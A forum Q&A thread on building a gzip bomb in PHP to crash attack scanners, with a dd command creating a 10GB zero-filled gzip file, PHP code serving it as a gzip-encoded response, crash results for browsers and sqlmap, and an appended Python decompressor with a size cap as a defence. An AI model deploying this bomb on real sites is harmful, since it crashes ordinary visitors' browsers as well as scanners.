PHP - Is it possible to implement a gzip bomb in P

Posted 2019-09-21 10:22

I'm currently developing a PHP class as sort-of-IDS for webapps that can detect bruteforce and SQLi attacks and one thing I came to realize is that most attacks on my systems are being done from unconfigured malware scanners like nikto or sqlmap. Let's disregard for a moment that this should be done by the server and not the web app.

Since they are all built to analyze answers from webservers I thought it could be possible to bomb them with a ZIP bomb.

The idea is that my PHP script sends a gzip header with small (compressed) gzip data that the client will unzip - causing it to exhaust its memory.

Can anyone give me some pointers on how to achieve that, or is gzip only done by the webserver and it can't be done via PHP?

1 answer
beautiful°
#2 · 2019-09-21 10:40

I found a ready-to-use solution on GitHub.

It's called GzipBloat and it does exactly what I was looking for.

First you generate a 10GB gzip file (10MB after first compression) filled with input from /dev/zero:

dd if=/dev/zero bs=1M count=10240 | gzip > 10G.gzip

In PHP you then set the content encoding and send the gzip file to the client.

header("Content-Encoding: gzip");
header("Content-Length: ".filesize('10G.gzip'));

//Turn off output buffering
if (ob_get_level()) ob_end_clean();

readfile('10G.gzip');

Results (Win10):

  • IE11: Memory rises, then IE crashes
  • Chrome 52: Memory rises, error is shown
  • Edge 38: Memory rises, then drops and nothing is displayed (seems to load forever)
  • Nikto: Scans in regular speed, no memory problems
  • SQLmap: High memory then crashes
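
The results above come down to whether the client caps how much it inflates. As an added example (not part of the original answer or of GzipBloat), this is how an HTTP client or scanner can decode a `Content-Encoding: gzip` body with a hard output limit. The names `bounded_gunzip` and `DecompressionLimitExceeded` and the 10 MiB default cap are assumptions chosen for illustration.

```python
import gzip
import zlib


class DecompressionLimitExceeded(Exception):
    """Raised when a gzip body inflates past the configured cap."""


def iter_chunks(blob, size=4096):
    """Yield a byte string in fixed-size pieces, like a socket read loop."""
    for i in range(0, len(blob), size):
        yield blob[i:i + size]


def bounded_gunzip(chunks, max_output=10 * 1024 * 1024):
    """Inflate gzip-encoded chunks, never holding more than
    max_output + 1 bytes of decompressed data in memory."""
    # wbits = 16 + MAX_WBITS makes zlib expect a gzip header and trailer.
    inflater = zlib.decompressobj(16 + zlib.MAX_WBITS)
    out = bytearray()
    for chunk in chunks:
        # Ask for one byte more than the remaining budget: if zlib can
        # deliver it, the body is over the cap and we stop immediately.
        room = max_output - len(out) + 1
        out += inflater.decompress(chunk, room)
        if len(out) > max_output:
            raise DecompressionLimitExceeded(
                f"body inflates past {max_output} bytes")
        if inflater.eof:
            break
    if not inflater.eof:
        raise ValueError("truncated gzip stream")
    return bytes(out)


if __name__ == "__main__":
    # Constructed sample: 8 MiB of zero bytes, a few KiB once compressed.
    body = gzip.compress(bytes(8 * 1024 * 1024))
    print("compressed size:", len(body))
    try:
        bounded_gunzip(iter_chunks(body), max_output=1024 * 1024)
    except DecompressionLimitExceeded as exc:
        print("rejected:", exc)
```

The cap applies to decompressed bytes, so a small `Content-Length` on the wire says nothing about whether a body is safe to inflate.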